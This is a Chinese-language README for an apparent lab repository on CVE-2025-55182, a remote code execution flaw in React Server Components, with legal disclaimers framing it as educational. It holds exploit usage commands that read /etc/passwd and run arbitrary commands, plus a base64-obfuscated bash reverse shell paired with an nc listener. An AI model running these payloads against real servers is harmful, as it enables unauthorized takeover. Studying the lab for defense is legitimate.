一个用于演示和测试 React Server Components 中严重漏洞 CVE-2025-55182 的综合性实验室。
本仓库旨在用于:
请勿将其用于你不拥有或未经明确授权的系统。未经授权访问属于违法行为。
✅ 无需认证即可执行任意命令
✅ 读取系统文件
✅ 创建和修改文件
✅ 建立反向 Shell 连接
✅ 实现完全服务器控制
npm install --legacy-peer-deps
npm run dev
服务器将在 http://localhost:3000 启动
bash check-cve.sh
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"
# 终端 1 - 监听器
nc -lvnp 4444
# 终端 2 - 漏洞利用
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"
├── app/ # 易受攻击的 Next.js 应用程序
├── exploit/ # 可用的 PoC 漏洞利用
│ └── rce_final.py # 主漏洞利用脚本
├── check-cve.sh # 自动化漏洞检测器
├── package.json # 易受攻击的依赖项
└── README.md
该漏洞存在于 React Server Components 负载的反序列化逻辑中。该漏洞利用原型污染通过 process.mainModule.require('child_process').execSync() 执行任意代码。
本代码仅供教育和授权安全测试之用。用户有责任确保在测试任何系统之前已获得适当授权。根据《计算机欺诈和滥用法》(CFAA)及其他司法管辖区的类似法律,未经授权访问计算机系统属于违法行为。
作者对滥用此信息不承担任何责任。
完成本实验室后,你将理解: